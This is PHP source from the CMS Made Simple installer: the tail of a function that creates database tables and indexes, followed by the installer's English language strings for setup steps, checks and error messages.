	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'userprefs', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_userprefs_by_user_id', CMS_DB_PREFIX."userprefs", 'user_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_userprefs_by_user_id', $ado_ret));



	$flds = "
		user_id I KEY,
		username C(25),
		password C(40),
		admin_access I1,
		first_name C(50),
		last_name C(50),
		email C(255),
		active I1,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."users", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'users', $ado_ret));



	$flds = "
		userplugin_id I KEY,
		userplugin_name C(255),
		code X,
		description X,
		create_date DT,
		modified_date DT
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."userplugins", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'userplugins', $ado_ret));



	$flds = "
		version I
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."version", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'version', $ado_ret));



	$flds = "
		sig C(80) KEY NOTNULL,
		name C(80) NOTNULL,
		module C(160) NOTNULL,
		type C(40) NOTNULL,
		callback C(255) NOTNULL,
		available I,
		cachable I1
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."module_smarty_plugins", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'module_smarty_plugins', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_smp_module', CMS_DB_PREFIX."module_smarty_plugins", 'module');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_smp_module', $ado_ret));


	$flds = "
		term C(255) KEY NOTNULL,
		key1 C(50) KEY NOTNULL,
		key2 C(50),
		key3 C(50),
		data X,
		created ".CMS_ADODB_DT;
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX."routes", $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', 'routes', $ado_ret));

	$flds = "
		id I KEY AUTO,
		originator C(50) NOTNULL,
		name C(100) NOTNULL,
		has_dflt I1,
		dflt_contents X2,
		description X,
		lang_cb C(255),
		dflt_content_cb C(255),
		requires_contentblocks I1,
		help_content_cb C(255),
		one_only I1,
		owner  I,
		created I,
		modified I";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME, $flds,
					 $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutTemplateType::TABLENAME, $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_type_1', CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME,
										'originator,name',array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_layout_tpl_type_1', $ado_ret));


	$flds = "
		id I KEY AUTO,
		name C(100) NOTNULL,
		description X,
		item_order X,
		modified I";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateCategory::TABLENAME, $flds,
					 $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	verbose_msg(ilang('install_created_table', CmsLayoutTemplateCategory::TABLENAME, $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_cat_1', CMS_DB_PREFIX.CmsLayoutTemplateCategory::TABLENAME,
										'name',array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_layout_tpl_type_1', $ado_ret));

	$flds = "
		id I KEY AUTO,
		name C(100) NOTNULL,
		content X2,
		description X,
		type_id I NOTNULL,
		type_dflt I1,
		category_id I,
		owner_id I NOTNULL,
		listable I1 DEFAULT 1,
		created I,
		modified I";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, $flds,
					 $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutTemplate::TABLENAME, $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_1', CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, 'name',array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_layout_tpl_1', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_2', CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, 'type_id,type_dflt');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_creating_index', 'idx_layout_tpl_2', $ado_ret));

	$flds = "
		id I KEY AUTO,
		name C(100) NOTNULL,
		content X2,
		description X,
 		media_type C(255),
		media_query X,
		created I,
		modified I";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutStylesheet::TABLENAME, $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutStylesheet::TABLENAME, $ado_ret));
	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_css_1',CMS_DB_PREFIX.CmsLayoutStylesheet::TABLENAME, 'name', array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_index', 'idx_layout_css_1', $ado_ret));

	$flds = "
		tpl_id I KEY,
		user_id I KEY
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::ADDUSERSTABLE, $flds,
					 $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	verbose_msg(ilang('install_created_table', CmsLayoutTemplate::ADDUSERSTABLE, $ado_ret));


	$flds = "
		id I KEY AUTO,
		name C(100) NOTNULL,
		description X,
		dflt I1,
		created I,
		modified I
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TABLENAME, $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutCollection::TABLENAME, $ado_ret));
	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_dsn_1',CMS_DB_PREFIX.CmsLayoutCollection::TABLENAME, 'name', array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_index', 'idx_layout_dsn_1', $ado_ret));


	$flds = "
		design_id I KEY NOTNULL,
		tpl_id  I KEY NOTNULL
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TPLTABLE, $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutCollection::TPLTABLE, $ado_ret));
	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_dsnassoc1', CMS_DB_PREFIX.CmsLayoutCollection::TPLTABLE, 'tpl_id');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_index', 'index_dsnassoc1', $ado_ret));

	$flds = "
		design_id I KEY NOTNULL,
		css_id  I KEY NOTNULL,
		item_order I NOTNULL
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::CSSTABLE, $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLayoutCollection::CSSTABLE, $ado_ret));

	$flds = "
		id I AUTO KEY NOTNULL,
		type C(20) NOTNULL,
		oid I NOTNULL,
		uid I NOTNULL,
		created I NOTNULL,
		modified I NOTNULL,
		lifetime I NOTNULL,
		expires I NOTNULL
	";
	$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLock::LOCK_TABLE, $flds, $taboptarray);
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	$ado_ret = ($return == 2) ? ilang('done') : ilang('failed');
	verbose_msg(ilang('install_created_table', CmsLock::LOCK_TABLE, $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks1', CMS_DB_PREFIX."locks", 'type,oid', array('UNIQUE'));
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	verbose_msg(ilang('install_created_index', 'index_locks1', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks2', CMS_DB_PREFIX."locks", 'expires');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	verbose_msg(ilang('install_created_index', 'index_locks2', $ado_ret));

	$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks3', CMS_DB_PREFIX."locks", 'uid');
	$return = $dbdict->ExecuteSQLArray($sqlarray);
	verbose_msg(ilang('install_created_index', 'index_locks3', $ado_ret));

}

# vim:ts=4 sw=4 noet
?>
<?php
# A
$lang['action_freshen'] = 'Freshening / Repairing a CMSMS %s installation';
$lang['action_install'] = 'Creating a new CMSMS %s website';
$lang['action_upgrade'] = 'Upgrading a CMSMS Website to version %s';
$lang['advanced_mode'] = 'Enable advanced mode';
$lang['apptitle'] = 'Installation and upgrade assistant';
$lang['assets_dir_exists'] = 'Assets directory exists';
$lang['available_languages'] = 'Available languages';

# B
$lang['build_date'] = 'Build Date';
$lang['build_reference'] = 'Build';

# C
$lang['changelog_uc'] = 'CHANGELOG';
$lang['cleaning_files'] = 'Cleaning files that are no longer applicable to the release';
$lang['config_writable'] = 'Check for writeable config file';
$lang['confirm_freshen'] = 'Are you sure you want to freshen (repair) the existing installation of CMSMS? Use with extreme caution!';
$lang['confirm_upgrade'] = 'Are you sure you want to begin the upgrade process';
$lang['curl_extension'] = 'Checking for the Curl extension';
$lang['create_assets_structure'] = 'Creating a location for file resources';

# D
$lang['database_support'] = 'Check for compatible database drivers';
$lang['desc_wizard_step1'] = 'Start the installation or upgrade process';
$lang['desc_wizard_step2'] = 'Analyze destination directory to find existing software';
$lang['desc_wizard_step3'] = 'Check to make sure everything is OK to install the CMSMS core';
$lang['desc_wizard_step4'] = 'For new installs, and freshen operation, enter basic configuration info';
$lang['desc_wizard_step5'] = 'For new installs, enter Admin account info';
$lang['desc_wizard_step6'] = 'For new installs enter some basic site details';
$lang['desc_wizard_step7'] = 'Extract files';
$lang['desc_wizard_step8'] = 'Create or update the database schema, set initial events, permissions, user accounts, templates, stylesheets and content';
$lang['desc_wizard_step9'] = 'Install and/or Upgrade modules as necessary, write the config file, and clean up.';
$lang['destination_directory'] = 'Destination Directory';
$lang['dest_writable'] = 'Write permission in destination directory';
$lang['disable_functions'] = 'Checking disabled functions';
$lang['done'] = 'Done';

# E
$lang['email_accountinfo_message'] = <<<EOT
Your installation of CMS Made Simple is complete.

This email contains sensitive information and should be stored in a secure location.

Here are the details of your installation.
username: %s
password: %s
install directory: %s
root url: %s

EOT;
$lang['email_accountinfo_message_exp'] = <<<EOT
Your installation of CMS Made Simple is complete.

This email contains sensitive information and should be stored in a secure location.

Here are the details of your installation.
username: %s
password: %s
install directory: %s

EOT;
$lang['email_accountinfo_subject'] = 'CMS Made Simple Installation Successful';
$lang['emailaccountinfo'] = 'Email the account information';
$lang['emailaddr'] = 'Email Address';
$lang['error_adminacct_emailaddr'] = 'The email address you specified is invalid';
$lang['error_adminacct_emailaddrrequired'] = 'You have selected to email the account information, but have not entered a valid email address';
$lang['error_adminacct_password'] = 'The password you specified is invalid (must be at least six characters long)';
$lang['error_adminacct_repeatpw'] = 'The passwords you entered did not match.';
$lang['error_adminacct_username'] = 'The username you specified is invalid. Please try again';
$lang['error_admindirrenamed'] = 'It appears that, for security reasons, you may have renamed your CMSMS Admin directory. You must reverse <a href="https://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">this process</a> in order to proceed!<br/><br/>Once you have reverted the admin directory name to its original location, please reload this page.';
$lang['error_backupconfig'] = 'We could not properly backup the config file';
$lang['error_checksum'] = 'Extracted file checksum does not match original';
$lang['error_cmstablesexist'] = 'It appears that there is already a CMS installation on this database. Please enter different database information. If you would like to use a different table prefix you may need to restart the installation process and enable advanced mode.';
$lang['error_createtable'] = 'Problem creating database table... perhaps this is a permissions issue';
$lang['error_dbconnect'] = 'We could not connect to the database. Please double check the credentials you have supplied';
$lang['error_dirnotvalid'] = 'The directory %s does not exist (or is not writeable)';
$lang['error_droptable'] = 'Problem dropping database table... perhaps this is a permissions issue';
$lang['error_filenotwritable'] = 'The file %s could not be overwritten (permissions problem)';
$lang['error_internal'] = 'Sorry, something has gone wrong... (internal error) (%s)';
$lang['error_invalid_directory'] = 'It appears that the directory you have selected to install in is a working directory for the installer itself';
$lang['error_invalidconfig'] = 'Error in the config file, or config file missing';
$lang['error_invaliddbpassword'] = 'Database password contains invalid characters that cannot be safely saved.';
$lang['error_invalidkey'] = 'Invalid member variable or key %s for class %s';
$lang['error_invalidparam'] = 'Invalid parameter or value for parameter: %s';
$lang['error_invalidtimezone'] = 'The timezone specified is invalid';
$lang['error_invalidqueryvar'] = 'The query variable entered contains invalid characters.  Please use only alphanumerics and underscore.';
$lang['error_missingconfigvar'] = 'The key &quot;%s&quot; is either missing or invalid in the config.ini file';
$lang['error_noarchive'] = 'Problem finding archive file... please restart';
$lang['error_nlsnotfound'] = 'Problem finding NLS files in archive';
$lang['error_nodatabases'] = 'No compatible database extensions could be found';
$lang['error_nodbhost'] = 'Please enter a valid hostname (or IP address) for the database connection';
$lang['error_nodbname'] = 'Please enter the name of a valid database on the host specified above';
$lang['error_nodbpass'] = 'Please enter a valid password for authenticating to the database';
$lang['error_nodbprefix'] = 'Please enter a valid prefix for database tables';
$lang['error_nodbtype'] = 'Please select a database type';
$lang['error_nodbuser'] = 'Please enter a valid username for authenticating to the database';
$lang['error_nodestdir'] = 'Destination directory not set';
$lang['error_nositename'] = 'Sitename is a required parameter. Please enter a suitable name for your website.';
$lang['error_notimezone'] = 'Please enter a valid timezone for this server';
$lang['error_overwrite'] = 'Permissions problem: cannot overwrite %s';
$lang['error_sendingmail'] = 'Error sending mail';
$lang['error_tzlist'] = 'A problem occurred retrieving the timezone identifiers list';
$lang['errorlevel_estrict'] = 'Checking for E_STRICT';
$lang['errorlevel_edeprecated'] = 'Checking for E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED is enabled in the PHPs error_reporting.  Though this will not prevent CMSMS from operating, it may result in warnings being displayed in the output screen, particularly from older, third party modules';
$lang['estrict_enabled'] = 'E_STRICT is enabled in the PHPs error_reporting. Though this will not prevent CMSMS from operating, it may result in warnings being displayed in the HTML output, particularly from older, third party modules';

# F
$lang['fail_assets_dir'] = 'An assets directory already exists.  This application may write to this directory to rationalize the location of files.  Please ensure that you have a backup';
$lang['fail_assets_msg'] = 'An assets directory already exists.  This application may write to this directory to rationalize the location of files.  Please ensure that you have a backup';
$lang['fail_config_writable'] = 'The HTTP process cannot write to the config.php file. Please try to change the permissions on this file to 777 until the upgrade process is complete';
$lang['fail_curl_extension'] = 'The curl extension was not found. Though not a critical issue, this may cause problems with some third party modules';
$lang['fail_database_support'] = 'No compatible database drivers found';
$lang['fail_file_get_contents'] = 'The file_get_contents function does not exist, or is disabled. CMSMS Cannot continue (even the installer will probably fail)';
$lang['fail_file_uploads'] = 'File upload capabilities are disabled in this environment. Several functions of CMSMS will not function in this environment';
$lang['fail_func_json'] = 'json functionality was not found';
$lang['fail_func_gzopen'] = 'gzopen function was not found';
$lang['fail_func_md5'] = 'md5 functionality was not found';
$lang['fail_func_tempnam'] = 'The tempnam function does not exist. It is a required function for CMSMS functionality';
$lang['fail_func_ziparchive'] = 'ZipArchive functionality was not found.  This may limit functionality';
$lang['fail_ini_set'] = 'It appears that we cannot change ini settings. This could cause problems in third party modules (or when enabling debug mode)';
$lang['fail_intl_support'] = 'PHP\'s internationalization extension is not available';
$lang['fail_magic_quotes_runtime'] = 'It appears that magic quotes are enabled in your configuration. Please disable them and retry';
$lang['fail_max_execution_time'] = 'Your max execution time of %s does not meet the minimum value of %s.  We recommend you increase it to %s or greater';
$lang['fail_memory_limit'] = 'Your memory limit value is too low. You had %s, however a minimum of %s is required, and %s is recommended';
$lang['fail_multibyte_support'] = 'Multibyte support is not enabled in your configuration';
$lang['fail_output_buffering'] = 'Output buffering is not enabled.';
$lang['fail_open_basedir'] = 'Open basedir restrictions are in effect. CMSMS requires that this be disabled';
$lang['fail_php_version'] = 'The version of PHP available to CMSMS is critically important. The minimum accepted version is %s, though we recommend %s or greater. You have %s';
$lang['fail_post_max_size'] = 'Your post_max_size of %s does not meet the minimum value of %s. A value of %s or greater is recommended, and ensure that it is larger than the upload_max_filesize';
$lang['fail_pwd_writable2'] = 'The HTTP process must be able to write to the destination directory (and to all files and directories beneath it) in order to install files. We do not have write permission to (at least) %s';
$lang['fail_register_globals'] = 'Please disable register globals in your PHP configuration';
$lang['fail_remote_url'] = 'We encountered problems connecting to a remote URL.  This will limit some of the functionality of CMS Made Simple';
$lang['fail_safe_mode'] = 'CMSMS will not operate properly in an environment where safe mode is enabled. Safe mode is deprecated as a failed mechanism, and will be removed in future versions of PHP';
$lang['fail_session_save_path_exists'] = 'The session save path variable value is invalid or the directory does not exist';
$lang['fail_session_save_path_writable'] = 'The session save path directory is not writeable';
$lang['fail_session_use_cookies'] = 'CMSMS requires that PHP be configured to store the session key in a cookie';
$lang['fail_tmpfile'] = 'The system tmpfile() function is not functioning. This is required to allow us to extract archives. The optional TMPDIR url argument can be provided to the installer to specify a writeable directory. See the README file that should be in included in this directory.';
$lang['fail_tmp_dirs_empty'] = 'The CMSMS temporary directories <em>(tmp/cache and tmp/templates_c) exist, and are not empty.  Please remove or empty them';
$lang['fail_xml_functions'] = 'The XML extension was not found. Please enable this in your PHP environment';
$lang['failed'] = 'failed';
$lang['file_get_contents'] = 'Testing for the file_get_contents function';
$lang['file_installed'] = 'Installed %s';
$lang['file_uploads'] = 'Checking for file upload support';
$lang['finished_custom_freshen_msg'] = 'Your installation has been freshened! The core files have been updated, and a new config file created. Please visit your website to ensure that everything is functioning correctly';
$lang['finished_custom_install_msg'] = 'Done! Please visit your website and login to the Admin panel.';
$lang['finished_custom_upgrade_msg'] = 'Done!  Please visit your CMSMS Admin panel, and frontend, to ensure that everything is working properly.<br/><strong>Hint:</strong> Now is a good time to create another backup.';
$lang['finished_freshen_msg'] = 'Your installation has been freshened! The core files have been updated, and a new config file created.  You can now <a href="%s">visit your website</a> or login to the <a href="%s">CMSMS Admin panel</a>.';
$lang['finished_install_msg'] = 'We are done! You can now <a href="%s">visit your website</a> or login to the <a href="%s">CMSMS admin panel</a>.';
$lang['finished_upgrade_msg'] = 'All done! Please visit your <a href="%s">website frontend</a> and the <a href="%s">Admin panel</a> to verify correct behaviour. You may also need to upgrade some third party modules.<br/><strong>Hint:</strong> Remember to create another backup after verifying correct behaviour.';
$lang['freshen'] = 'Freshen (repair) installation';
$lang['func_json'] = 'Checking for json encoding and decoding functionality';
$lang['func_md5'] = 'Checking for md5 functionality';
$lang['func_tempnam'] = 'Check for tempnam function';
$lang['func_gzopen'] = 'Check for gzopen function';
$lang['func_ziparchive'] = 'Check for ziparchive function';

# G
$lang['gd_version'] = 'GD Version';
$lang['goback'] = 'Back';

# H

# I
$lang['info_addlanguages'] = 'Select languages (in addition to English) to install. <strong>Note:</strong> not all translations are complete.';
$lang['info_adminaccount'] = 'Please provide credentials for the initial administrator account. This account will have access to all of the functionality of the CMSMS Admin console.';
$lang['info_advanced'] = 'Advanced mode enables more options in the installation procedure.';
$lang['info_dbinfo'] = 'CMS Made Simple stores a great deal of data in the database. A database connection is mandatory. Additionally, the user credentials you supply should have ALL PRIVILEGES on the specified database to allow creating, dropping and modifying tables, indexes and views.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED is a flag for PHP&quot;s error reporting that indicates that warnings should be displayed about code that is using deprecated techniques.  Although the CMSMS core attempts to ensure that we no longer use deprecated techniques, some modules may not.  We recommend that this setting be disabled in the PHP configuration';
$lang['info_errorlevel_estrict'] = 'E_STRICT is a flag for PHP&#39;s error reporting which indicates that strict coding standards should be respected. Although the CMSMS core attempts to conform to E_STRICT standards, some modules may not. We recommend that this setting be disabled in the PHP configuration';
$lang['info_installcontent'] = 'By default, this installer will create a series of sample pages, stylesheets and templates in CMSMS. The sample content provides extensive information and tips to aid in building websites with CMSMS and is useful to read. However, if you are already familiar with CMS Made Simple, disabling this option will result in a minimal set of templates, stylesheets and content pages.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir is enabled in your PHP configuration. We could not properly test session capabilities. However, getting to this point in the installation process probably indicates that sessions are working okay.';
$lang['info_optional_modules'] = 'The following modules can be installed or left out of the installation if you do not wish to use them. Sample content is provided for each module.';
$lang['info_pwd_writable'] = 'This application needs write permission to the current working directory';
$lang['info_queryvar'] = 'The query variable is used internally by CMSMS to identify the page requested. In most circumstances you should not need to adjust this.';
$lang['info_sitename'] = 'The website name is used in default templates as part of the title. Please enter a human readable name for the website';
$lang['info_timezone'] = 'The timezone information is needed for time calculations and time/date displays. Please select the server timezone';
$lang['info_directory_not_created'] = 'Directory "%s" was not created';
$lang['ini_set'] = 'Testing if we can change INI settings';
$lang['install'] = 'Install';
$lang['install_attachstylesheets'] = 'Attach stylesheets to themes';
$lang['install_backupconfig'] = 'Backing up the config file';
$lang['install_createassets'] = 'Create assets structure';
$lang['install_created_index'] = 'Created index %s ... %s';
$lang['install_create_tables'] = 'Create database tables';
$lang['install_createconfig'] = 'Create new config file';
$lang['install_createcontentpages'] = 'Create default content pages';
$lang['install_created_table'] = 'Created table %s: .... %s';
$lang['install_createtablesindexes'] = 'Creating tables and indexes';
$lang['install_createtmpdirs'] = 'Create temporary directories';
$lang['install_creating_index'] = 'Created index %s';
$lang['install_default_collections'] = 'Install default collections';
$lang['install_defaultcontent'] = 'Install default content';
$lang['install_detectlanguages'] = 'Detect installed languages';
$lang['install_dropping_tables'] = 'Dropping tables';
$lang['install_dummyindexhtml'] = 'Create dummy index.html files';
$lang['install_extractfiles'] = 'Extract files from archive';
$lang['install_initevents'] = 'Create events';
$lang['install_initsitegroups'] = 'Create initial groups';
$lang['install_initsiteperms'] = 'Set initial permissions';
$lang['install_initsiteprefs'] = 'Set initial site preferences';
$lang['install_initsiteusers'] = 'Create initial user account';
$lang['install_initsiteusertags'] = 'Initial user defined tags';
$lang['install_module'] = 'Install module %s';
$lang['install_modules'] = 'Install available modules';
$lang['install_passwordsalt'] = 'Set password salt';
$lang['install_requireddata'] = 'Set initial required data';
$lang['install_schema'] = 'Create database schema';
$lang['install_setschemaver'] = 'Set schema version';
$lang['install_setsequence'] = 'Reset sequence tables';
$lang['install_setsitename'] = 'Set site name';
$lang['install_stylesheets'] = 'Create default stylesheets';
$lang['install_templates'] = 'Create default templates';
$lang['install_templatetypes'] = 'Create standard template types';
$lang['install_update_sequences'] = 'Update sequence tables';
$lang['install_updatehierarchy'] = 'Update content hierarchy positions';
$lang['install_updateseq'] = 'Update sequence for %s';
$lang['installer_ver'] = 'Installer Version';
$lang['intl_support'] = 'Check for internationalization capabilities';

# J

# K

# L
$lang['legend'] = 'Legend';

# M
$lang['magic_quotes_runtime'] = 'Ensure magic quotes are disabled';
$lang['max_execution_time'] = 'Checking PHP script max execution time';
$lang['meaning'] = 'Meaning';
$lang['memory_limit'] = 'Checking for a sufficient PHP memory limit';
$lang['msg_clearedcache'] = 'Cleared server cache';
$lang['msg_configsaved'] = 'Existing config file saved to %s';
$lang['msg_upgrade_module'] = 'Upgrading module %s';
$lang['msg_upgrademodules'] = 'Upgrading modules';
$lang['msg_yourvalue'] = 'You have: %s';
$lang['multibyte_support'] = 'Check for multibyte support';

# N
$lang['next'] = 'Next';
$lang['no'] = 'No';
$lang['none'] = 'None';

# O
$lang['open_basedir'] = 'open_basedir restrictions';
$lang['open_basedir_session_save_path'] = 'open_basedir is in enabled. Cannot test session save path.';
$lang['output_buffering'] = 'Ensuring that output buffering is enabled';

# P
$lang['pass_config_writable'] = 'The HTTP process has write permission to the config.php file';
$lang['pass_database_support'] = 'At least one compatible database driver found';
$lang['pass_func_json'] = 'json functionality detected';
$lang['pass_func_md5'] = 'md5 functionality was detected';
$lang['pass_func_tempnam'] = 'The tempnam function exists';
$lang['pass_intl_support'] = 'Internationalization capabilities appear to be enabled';
$lang['pass_memory_limit_nolimit'] = 'There is no preset PHP memory limit';
$lang['pass_multibyte_support'] = 'Multibyte support appears to be enabled';
$lang['pass_php_version'] = 'The PHP version currently configured does not meet minimum requirements. At a minimum, PHP %s is required, though we recommend %s or higher';
$lang['pass_pwd_writable'] = 'The HTTP process can write into the destination directory. This is necessary for extracting files';
$lang['password'] = 'Password';
$lang['ph_sitename'] = 'Enter a Site Name';
$lang['php_version'] = 'PHP Version';
$lang['post_max_size'] = 'Checking maximum amount of data that can be posted in one request';
$lang['prompt_addlanguages'] = 'Additional Languages';
$lang['prompt_createtables'] = 'Create Database Tables';
$lang['prompt_dbhost'] = 'Database Hostname';
$lang['prompt_dbinfo'] = 'Database Information';
$lang['prompt_dbname'] = 'Database Name';
$lang['prompt_dbpass'] = 'Password';
$lang['prompt_dbport'] = 'Database Port Number';
$lang['prompt_dbprefix'] = 'Database Table Name Prefix';
$lang['prompt_dbtype'] = 'Database Type';
$lang['prompt_dbuser'] = 'Username';
$lang['prompt_dir'] = 'Installation Directory';
$lang['prompt_installcontent'] = 'Install Sample Content';
$lang['prompt_optional_modules'] = 'Install Optional Modules';
$lang['prompt_queryvar'] = 'Query Variable';
$lang['prompt_sitename'] = 'Web Site Name';
$lang['prompt_timezone'] = 'Server Timezone';
$lang['pwd_writable'] = 'Directory Writeable';

# Q
$lang['queue_for_upgrade'] = 'Queued non core module %s for upgrade at the next step.';

# R
$lang['readme_uc'] = 'README';
$lang['register_globals'] = 'Ensuring &quot;register globals&quot; is disabled';
$lang['remote_url'] = 'Test if we can make outgoing HTTP connections';
$lang['repeatpw'] = 'Repeat password';
$lang['reset_site_preferences'] = 'Reset some site preferences';
$lang['reset_user_settings'] = 'Reset user preferences';
$lang['retry'] = 'Retry';

# S
$lang['safe_mode'] = 'Testing to ensure &quot;safe mode&quot; is disabled';
$lang['saltpasswords'] = 'Salt Passwords';
$lang['select_language'] = 'The first thing we will ask you to do is to select your preferred language from the list below. This will be used to enhance your experience during this installation sequence, but will not affect your CMSMS installation.';
$lang['send_admin_email'] = 'Send Admin login credentials email';
$lang['session_capabilities'] = 'Testing for proper session capabilities (sessions are using cookies and session save path is writeable, etc)';
$lang['session_save_path_exists'] = 'Session_save_path exists';
$lang['session_save_path_writable'] = 'Session_save_path is writeable';
$lang['session_use_cookies'] = 'Ensuring that PHP sessions use cookies';
$lang['sometests_failed'] = 'We have performed numerous tests of your current web environment. Although no critical issues were found, we recommend that the following items be corrected before continuing.';
$lang['step1_advanced'] = 'Advanced Mode';
$lang['step1_destdir'] = 'Select Directory';
$lang['step1_info_destdir'] = '<strong>Warning:</strong> This program can install or upgrade multiple installations of CMS Made Simple. It is important that you select the correct directory for installation or upgrading.';
$lang['step1_language'] = 'Select Language';
$lang['step1_title'] = 'Select Language';
$lang['step2_cmsmsfound'] = 'An installation of CMS Made Simple was found. It is possible to upgrade this installation. However, before proceeding, ensure that you have a current, VERIFIED backup of all files and of the database';
$lang['step2_cmsmsfoundnoupgrade'] = 'Although an installation of CMS Made Simple was found, it is not possible to upgrade this version using this application. The version may be too old.';
$lang['step2_confirminstall'] = 'Are you sure you would like to install CMS Made Simple';
$lang['step2_confirmupgrade'] = 'Are you sure you would like to upgrade CMS Made Simple';
$lang['step2_errorsamever'] = 'The selected directory appears to contain a CMSMS installation with the same version that is included in this script. Continuing will freshen the installation.';
